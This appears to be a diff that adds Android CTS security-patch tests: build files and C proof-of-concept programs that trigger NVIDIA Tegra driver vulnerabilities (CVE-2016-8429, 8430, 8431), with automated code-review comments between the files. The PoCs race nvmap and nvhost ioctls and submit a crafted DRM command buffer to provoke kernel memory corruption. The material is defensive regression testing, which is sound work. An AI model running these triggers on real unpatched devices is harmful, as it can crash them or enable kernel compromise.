+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8429/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8429/poc.c
new file mode 100644
index 0000000..293f617
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8429/poc.c
@@ -0,0 +1,176 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdlib.h>
+#include <errno.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>  
+#include <unistd.h> 
+#include <sched.h>
+
+#define NVMAP_HEAP_CARVEOUT_IRAM    (1ul<<29)
+#define NVMAP_HEAP_CARVEOUT_VPR     (1ul<<28)
+#define NVMAP_HEAP_CARVEOUT_TSEC    (1ul<<27)
+#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
+
+#define NVMAP_HEAP_CARVEOUT_MASK    (NVMAP_HEAP_IOVMM - 1)
+
+/* allocation flags */
+#define NVMAP_HANDLE_UNCACHEABLE     (0x0ul << 0)
+#define NVMAP_HANDLE_WRITE_COMBINE   (0x1ul << 0)
+#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
+#define NVMAP_HANDLE_CACHEABLE       (0x3ul << 0)
+#define NVMAP_HANDLE_CACHE_FLAG      (0x3ul << 0)
+
+#define NVMAP_HANDLE_SECURE          (0x1ul << 2)
+#define NVMAP_HANDLE_KIND_SPECIFIED  (0x1ul << 3)
+#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
+#define NVMAP_HANDLE_ZEROED_PAGES    (0x1ul << 5)
+#define NVMAP_HANDLE_PHYS_CONTIG     (0x1ul << 6)
+#define NVMAP_HANDLE_CACHE_SYNC      (0x1ul << 7)
+
+struct nvmap_handle_param {
+	__u32 handle;		/* nvmap handle */
+	__u32 param;		/* size/align/base/heap etc. */
+	unsigned long result;	/* returns requested info*/
+};
+
+struct nvmap_create_handle {
+	union {
+		__u32 id;	/* FromId */
+		__u32 size;	/* CreateHandle */
+		__s32 fd;	/* DmaBufFd or FromFd */
+	};
+	__u32 handle;		/* returns nvmap handle */
+};
+
+struct nvmap_alloc_handle {
+	__u32 handle;		/* nvmap handle */
+	__u32 heap_mask;	/* heaps to allocate from */
+	__u32 flags;		/* wb/wc/uc/iwb etc. */
+	__u32 align;		/* min alignment necessary */
+};
+
+#define NVMAP_IOC_MAGIC 'N'
+#define NVMAP_IOC_CREATE  _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
+#define NVMAP_IOC_GET_ID  _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
+#define NVMAP_IOC_GET_FD  _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
+#define NVMAP_IOC_FREE       _IO(NVMAP_IOC_MAGIC, 4)
+#define NVMAP_IOC_ALLOC    _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+#define NVMAP_IOC_FROM_FD _IOWR(NVMAP_IOC_MAGIC, 16, struct nvmap_create_handle)
+int g_fd = -1;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+struct nvmap_create_handle* g_allocation = NULL;
+struct nvmap_create_handle g_allocation_dup;
+
+int open_driver() {
+    char* dev_path = "/dev/nvmap";
+    g_fd = open(dev_path, O_RDWR);
+    if (g_fd < 0) {
+        printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+    } else {
+        printf("[*] open file(%s) succ!\n", dev_path);
+    }
+    return g_fd;
+}
+
+void trigger_nvmap_create() {
+    ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
+}
+
+void trigger_nvmap_create_dup(int fd) {
+    g_allocation_dup.fd = fd;
+    ioctl(g_fd, NVMAP_IOC_FROM_FD, &g_allocation_dup);
+}
+
+void trigger_nvmap_alloc() {
+    struct nvmap_alloc_handle alloc = {0};
+    alloc.align = 0x1000;
+    alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
+    alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
+    alloc.handle = g_allocation->handle;
+    ioctl(g_fd, NVMAP_IOC_ALLOC, &alloc);
+}
+
+void trigger_nvmap_free(int fd) {
+    ioctl(g_fd, NVMAP_IOC_FREE, fd);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+    setpriority(PRIO_PROCESS, gettid(), privi);
+
+    /* bind process to a CPU*/
+    if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+    }
+}
+
+void prepare_data() {
+    void* data = (void *) memalign(0x1000, 4 * 0x1000);
+    //void* data = malloc(0x10000);
+    printf("[*] data = %p\n", data);
+    g_allocation = (struct nvmap_create_handle*)data;
+    g_allocation->size = 1024;
+    g_allocation->handle = -1;
+    mprotect(data, 0x1000, PROT_READ);
+    printf("[*] mprotect, error = %d\n", errno);
+}
+
+void* race_thread(void* arg) {
+    setup_privi_and_affinity(-10, 2);
+    
+    pthread_mutex_lock(&mutex);
+    pthread_cond_wait(&cond, &mutex);
+    pthread_mutex_unlock(&mutex);
+    
+    while (1)
+        close(1024);
+}
+
+int main(int argc, char**argv) {
+    
+    setup_privi_and_affinity(-10, 1);
+    
+    if (open_driver() < 0) {
+        return -1;
+    }
+    prepare_data();
+    
+    pthread_t tid;
+    pthread_create(&tid, NULL, race_thread, NULL);
+    usleep(100 * 1000);
+    
+    pthread_cond_signal(&cond);
+    usleep(20);
+    while (1) {
+        trigger_nvmap_create();
+    }
+    return 0;
+}
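Review bot: `main` ends in `while (1) { trigger_nvmap_create(); }` and `race_thread` in `while (1) close(1024);`, so the binary never exits on its own and `return 0;` is unreachable; on a patched device the run ends only when something outside the process kills it. Bound the loop with an iteration count or a deadline and return a defined status, e.g. `for (i = 0; i < MAX_ITERATIONS; i++) trigger_nvmap_create();` where `MAX_ITERATIONS` is a limit the test owner chooses, and let the helper thread poll a stop flag so it can be joined. A comment at the top of the file stating what the host side treats as pass and fail would also help, since nothing in this file reports a verdict. `prepare_data` uses the `memalign` result without a NULL check, and no `<malloc.h>` include is visible for it.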
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8430/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8430/Android.mk
new file mode 100644
index 0000000..839047b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8430/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8430
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8430/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8430/poc.c
new file mode 100644
index 0000000..0717d0b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8430/poc.c
@@ -0,0 +1,204 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+
+#include <errno.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+#include <stdlib.h>
+
+struct nvhost_channel_open_args {
+	__s32 channel_fd;
+};
+struct nvhost_set_error_notifier {
+	__u64 offset;
+	__u64 size;
+	__u32 mem;
+	__u32 padding;
+};
+#define NVHOST_IOCTL_MAGIC 'H'
+#define NVHOST_IOCTL_CHANNEL_OPEN	\
+	_IOR(NVHOST_IOCTL_MAGIC,  112, struct nvhost_channel_open_args)
+#define NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER  \
+	_IOWR(NVHOST_IOCTL_MAGIC, 111, struct nvhost_set_error_notifier)
+struct nvmap_create_handle {
+	union {
+		__u32 id;	/* FromId */
+		__u32 size;	/* CreateHandle */
+		__s32 fd;	/* DmaBufFd or FromFd */
+	};
+	__u32 handle;		/* returns nvmap handle */
+};
+struct nvmap_alloc_handle {
+	__u32 handle;		/* nvmap handle */
+	__u32 heap_mask;	/* heaps to allocate from */
+	__u32 flags;		/* wb/wc/uc/iwb etc. */
+	__u32 align;		/* min alignment necessary */
+};
+#define NVMAP_HEAP_CARVEOUT_IRAM    (1ul<<29)
+#define NVMAP_HEAP_CARVEOUT_VPR     (1ul<<28)
+#define NVMAP_HEAP_CARVEOUT_TSEC    (1ul<<27)
+#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
+
+#define NVMAP_HEAP_CARVEOUT_MASK    (NVMAP_HEAP_IOVMM - 1)
+
+/* allocation flags */
+#define NVMAP_HANDLE_UNCACHEABLE     (0x0ul << 0)
+#define NVMAP_HANDLE_WRITE_COMBINE   (0x1ul << 0)
+#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
+#define NVMAP_HANDLE_CACHEABLE       (0x3ul << 0)
+#define NVMAP_HANDLE_CACHE_FLAG      (0x3ul << 0)
+
+#define NVMAP_HANDLE_SECURE          (0x1ul << 2)
+#define NVMAP_HANDLE_KIND_SPECIFIED  (0x1ul << 3)
+#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
+#define NVMAP_HANDLE_ZEROED_PAGES    (0x1ul << 5)
+#define NVMAP_HANDLE_PHYS_CONTIG     (0x1ul << 6)
+#define NVMAP_HANDLE_CACHE_SYNC      (0x1ul << 7)
+#define NVMAP_IOC_MAGIC 'N'
+
+/* Creates a new memory handle. On input, the argument is the size of the new
+ * handle; on return, the argument is the name of the new handle
+ */
+ #define NVMAP_IOC_ALLOC    _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+#define NVMAP_IOC_CREATE  _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_FREE       _IO(NVMAP_IOC_MAGIC, 4)
+int g_fd = -1;
+int g_nvmap_fd = -1;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+int g_channel_fd = -1;
+struct nvhost_set_error_notifier g_error_notifier;
+struct nvmap_create_handle g_nvmap_hdl;
+
+struct nvmap_alloc_handle g_real_alloc = {0};
+
+int open_driver() {
+    char* dev_path = "/dev/nvhost-vic";
+    g_fd = open(dev_path, O_RDONLY);
+    if (g_fd < 0) {
+        printf("open file(%s) failed, errno=%d\n", dev_path, errno);
+        return -1;
+    } else {
+        printf("open file(%s) succ!\n", dev_path);
+    }
+
+    dev_path = "/dev/nvmap";
+    g_nvmap_fd = open(dev_path, O_RDONLY);
+    if (g_nvmap_fd < 0) {
+        printf("open file(%s) failed, errno=%d\n", dev_path, errno);
+        return -1;
+    } else {
+        printf("open file(%s) succ!\n", dev_path);
+    }
+    return 1;
+}
+
+void trigger_channel_open() {
+    struct nvhost_channel_open_args args = {-1};
+    ioctl(g_fd, NVHOST_IOCTL_CHANNEL_OPEN, &args);
+    g_channel_fd = args.channel_fd;
+}
+
+int trigger_nvmap_create() {
+    g_nvmap_hdl.size = 0x1000;
+    ioctl(g_nvmap_fd, NVMAP_IOC_CREATE, &g_nvmap_hdl);
+    return g_nvmap_hdl.handle;
+}
+
+void trigger_nvmap_free() {
+    int data = g_nvmap_hdl.handle;
+    ioctl(g_nvmap_fd, NVMAP_IOC_FREE, data);
+}
+void trigger_nvmap_alloc(int handle) {
+    g_real_alloc.align = 0x1000;
+    g_real_alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
+    g_real_alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
+    g_real_alloc.handle = handle;
+    ioctl(g_nvmap_fd, NVMAP_IOC_ALLOC, &g_real_alloc);
+}
+void prepare_data() {
+    g_error_notifier.offset = 0;
+    g_error_notifier.mem = g_nvmap_hdl.handle;
+}
+
+void trigger_set_error_notifier() {
+    ioctl(g_fd, NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER, &g_error_notifier);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+    setpriority(PRIO_PROCESS, gettid(), privi);
+
+    /* bind process to a CPU*/
+    if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+    }
+}
+
+void* race_thread(void* arg) {
+    setup_privi_and_affinity(-19, 2);
+    pthread_mutex_lock(&mutex);
+    pthread_cond_wait(&cond, &mutex);
+    pthread_mutex_unlock(&mutex);
+    while (1) {
+        trigger_set_error_notifier();
+    }
+    return NULL;
+}
+
+void* race_thread_2(void* arg) {
+    setup_privi_and_affinity(-19, 1);
+    pthread_mutex_lock(&mutex);
+    pthread_cond_wait(&cond, &mutex);
+    pthread_mutex_unlock(&mutex);
+    while (1) {
+        trigger_set_error_notifier();
+    }
+    return NULL;
+}
+
+int main(int argc, char**argv) {
+    setup_privi_and_affinity(0, 1);
+    if (open_driver() < 0) {
+        return -1;
+    }
+    //trigger_nvmap_create();
+    trigger_nvmap_alloc(trigger_nvmap_create());
+    prepare_data();
+    //trigger_nvmap_free();
+    pthread_t tid;
+    pthread_create(&tid, NULL, race_thread, NULL);
+    pthread_create(&tid, NULL, race_thread_2, NULL);
+    usleep(100 * 1000);
+    pthread_cond_broadcast(&cond);
+
+    sleep(100);
+    return 0;
+}
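Review bot: `race_thread` and `race_thread_2` are identical apart from the CPU mask passed to `setup_privi_and_affinity`, and both ignore `arg`. One function taking the mask through `arg` would remove the copy: `setup_privi_and_affinity(-19, (unsigned long)arg);` with `pthread_create(&tid, NULL, race_thread, (void *)2UL);` and `(void *)1UL` for the second thread. Also, `open_driver` returns -1 without closing `g_fd` when opening `/dev/nvmap` fails, and `main` reuses one `tid` for both threads and never joins them, relying on the fixed `sleep(100)` before returning.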
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8431/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8431/Android.mk
new file mode 100644
index 0000000..d0ef823
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8431/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8431
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8431/local_poc.h b/hostsidetests/security/securityPatch/CVE-2016-8431/local_poc.h
new file mode 100644
index 0000000..c74db80
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8431/local_poc.h
@@ -0,0 +1,245 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __LOCAL_POC_H__
+#define __LOCAL_POC_H__
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME     0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM         (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD            13
+#define PRIV_CMD_OID                    15
+#define PRIV_CMD_SW_CTRL                20
+#define PRIV_CMD_WSC_PROBE_REQ          22
+
+enum host1x_class {
+        HOST1X_CLASS_HOST1X = 0x1,
+        HOST1X_CLASS_NVENC = 0x21,
+        HOST1X_CLASS_VI = 0x30,
+        HOST1X_CLASS_ISPA = 0x32,
+        HOST1X_CLASS_ISPB = 0x34,
+        HOST1X_CLASS_GR2D = 0x51,
+        HOST1X_CLASS_GR2D_SB = 0x52,
+        HOST1X_CLASS_VIC = 0x5D,
+        HOST1X_CLASS_GR3D = 0x60,
+        HOST1X_CLASS_NVJPG = 0xC0,
+        HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_TEGRA_GEM_CREATE		0x00
+#define DRM_COMMAND_BASE                0x40
+#define DRM_COMMAND_END                 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL          0x05
+#define DRM_TEGRA_CLOSE_CHANNEL         0x06
+#define DRM_TEGRA_SUBMIT		0x08
+
+struct drm_tegra_open_channel {
+        __u32 client;
+        __u32 pad;
+        __u64 context;
+};
+
+struct drm_tegra_close_channel {
+        __u64 context;
+};
+
+struct drm_tegra_cmdbuf {
+	__u32 handle;
+	__u32 offset;
+	__u32 words;
+	__u32 pad;
+};
+
+struct host1x_waitchk {
+	struct host1x_bo *bo;
+	__u32 offset;
+	__u32 syncpt_id;
+	__u32 thresh;
+};
+
+struct drm_tegra_waitchk {
+	__u32 handle;
+	__u32 offset;
+	__u32 syncpt;
+	__u32 thresh;
+};
+
+struct drm_tegra_submit {
+	__u64 context;
+	__u32 num_syncpts;
+	__u32 num_cmdbufs;
+	__u32 num_relocs;
+	__u32 num_waitchks;
+	__u32 waitchk_mask;
+	__u32 timeout;
+	__u64 syncpts;
+	__u64 cmdbufs;
+	__u64 relocs;
+	__u64 waitchks;
+	__u32 fence;		/* Return value */
+	__u32 reserved0;
+	__u64 fences;
+	__u32 reserved1[2];	/* future expansion */
+};
+
+struct drm_tegra_gem_create {
+	__u64 size;
+	__u32 flags;
+	__u32 handle;
+};
+
+struct drm_gem_close {
+	__u32 handle;
+	__u32 pad;
+};
+
+struct drm_mode_map_dumb {
+	__u32 handle;
+	__u32 pad;
+	__u64 offset;
+};
+
+#define DRM_IOCTL_BASE                  'd'
+#define DRM_IOWR(nr,type)       _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOW(nr,type)		_IOW(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
+#define DRM_IOCTL_TEGRA_GEM_CREATE DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_GEM_CREATE, struct drm_tegra_gem_create)
+#define DRM_IOCTL_GEM_CLOSE		DRM_IOW (0x09, struct drm_gem_close)
+#define DRM_IOCTL_MODE_MAP_DUMB    DRM_IOWR(0xB3, struct drm_mode_map_dumb)
+
+struct drm_tegra_syncpt {
+	__u32 id;
+	__u32 incrs;
+};
+
+struct list_head {
+	struct list_head *next, *prev;
+};
+
+struct kobject {
+	const char			*name;
+	struct list_head	entry;
+	struct kobject		*parent;
+	void	*kset;
+	void	*ktype;
+	void	*sd;
+	unsigned long refcount;
+	unsigned int state_initialized:1;
+	unsigned int state_in_sysfs:1;
+	unsigned int state_add_uevent_sent:1;
+	unsigned int state_remove_uevent_sent:1;
+	unsigned int uevent_suppress:1;
+};
+
+struct device {
+	struct device	*parent;
+	void	*p;
+	void*	pad0[8];
+	char	*init_name; 
+	void	*type;
+	void*	pad1[5];
+	void	*bus;
+	void	*driver;
+	void	*platform_data;
+	void	*driver_data;
+};
+
+struct host1x_info {
+	int	nb_channels;		
+	int	nb_pts;
+	int	nb_bases;
+	int	nb_mlocks;
+	int	(*init)(void *);
+	int	sync_offset;
+};
+
+struct host1x_syncpt_ops {
+	void (*restore)(void *syncpt);
+	void (*restore_wait_base)(void *syncpt);
+	void (*load_wait_base)(void *syncpt);
+	__u32 (*load)(void *syncpt);
+	int (*cpu_incr)(void *syncpt);
+	int (*patch_wait)(void *syncpt, void *patch_addr);
+};
+
+struct host1x {
+	struct host1x_info *info;
+	void	*regs;
+	void	*syncpt;
+	void	*bases;
+	struct device *dev;
+	void	*clk;
+	void	*clk_actmon;
+	void*	pad[5];
+	void	*intr_wq;
+	int intr_syncpt_irq;
+	int intr_general_irq;
+	__u32 intstatus;
+	void (*host_isr[32])(__u32, void *);
+	void *host_isr_priv[32];
+	struct host1x_syncpt_ops *syncpt_op;
+	void	*intr_op;
+	void	*channel_op;
+	void	*cdma_op;
+	void	*cdma_pb_op;
+	void	*actmon_op;
+	void	*debug_op;
+};
+
+struct host1x_client {
+	struct list_head list;
+	void *parent;
+	struct device *dev;
+	void *ops;
+};
+
+struct tegra_drm_client_ops {
+	void* open_channel;
+	void* close_channel; 
+	void* reset;
+	void* is_add_reg;
+	void* submit;
+};
+
+struct tegra_drm_client {
+	unsigned char pad[232];
+	struct list_head list;
+	struct tegra_drm_client_ops *ops;
+};
+
+struct tegra_drm_context {
+	struct tegra_drm_client *client;
+	void *channel;
+	struct list_head list;
+};
+
+struct drm_tegra_reloc {
+	struct {
+		__u32 handle;
+		__u32 offset;
+	} cmdbuf;
+	struct {
+		__u32 handle;
+		__u32 offset;
+	} target;
+	__u32 shift;
+	__u32 pad;
+};
+
+#endif
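Review bot: This header is not self-contained: it uses `__u32`/`__u64` and the `_IOWR`/`_IOW` macros but includes nothing, so it compiles only because poc.c includes `<sys/ioctl.h>` before it. Add `#include <linux/types.h>` and `#include <sys/ioctl.h>` right after the include guard. The guard name `__LOCAL_POC_H__` uses a reserved double-underscore prefix; `LOCAL_POC_H` would do. A large part of the file (the `SIOCIW*`/`PRIV_*` constants and the `kobject`, `device`, `host1x*` and `tegra_drm_client*` copies) is not referenced by the poc.c added next to it. The identical header is added again under CVE-2016-8432 (same blob `c74db80`), so trimming it or sharing one copy would reduce maintenance.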
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8431/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8431/poc.c
new file mode 100644
index 0000000..1cc0f29
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8431/poc.c
@@ -0,0 +1,91 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <stdio.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <sys/ioctl.h>
+
+#include "local_poc.h"
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt " %d %s\n", ##__VA_ARGS__, errno, strerror(errno))
+
+#define DEV "/dev/dri/renderD129"
+#define CMD_NUM		1
+
+int dev_fd;
+
+volatile struct drm_tegra_open_channel	open_c;
+volatile struct drm_tegra_submit		submit_c;
+volatile struct drm_tegra_gem_create	gem_create;
+
+struct drm_tegra_cmdbuf		cmdbufs[CMD_NUM];
+struct drm_tegra_syncpt		syncpt;
+struct drm_tegra_reloc		relocs[CMD_NUM];
+
+static int prepare()
+{
+	open_c.client = HOST1X_CLASS_VIC;
+	submit_c.num_syncpts = 1;
+	submit_c.syncpts = (__u64)&syncpt;	
+	submit_c.num_cmdbufs = CMD_NUM;
+	submit_c.cmdbufs = (__u64)cmdbufs;
+	submit_c.num_relocs = CMD_NUM;
+	submit_c.relocs = (__u64)relocs;
+	gem_create.size = PAGE_SIZE;
+	return 0;
+}
+
+int main()
+{
+	int ret;
+	int i;
+
+	dev_fd = open(DEV,O_RDONLY);
+	if(dev_fd == -1){
+		return 0;
+	}
+
+	prepare();
+
+	ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+	if(ret == -1){
+		goto out_dev;
+	}
+
+	submit_c.context = open_c.context;
+
+	ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_GEM_CREATE, &gem_create);
+	if(ret == 0){
+		for(i = 0; i < CMD_NUM; i++){
+			cmdbufs[i].words = 0;
+			cmdbufs[i].offset = 0;
+			cmdbufs[i].handle = gem_create.handle;
+			relocs[i].cmdbuf.handle = gem_create.handle;
+			relocs[i].cmdbuf.offset = 8192;
+			relocs[i].target.handle = gem_create.handle;
+			relocs[i].target.offset = 8192;
+		}
+		ioctl(dev_fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
+	}else{
+	}
+
+out_dev:
+	close(dev_fd);
+	return 0;
+}
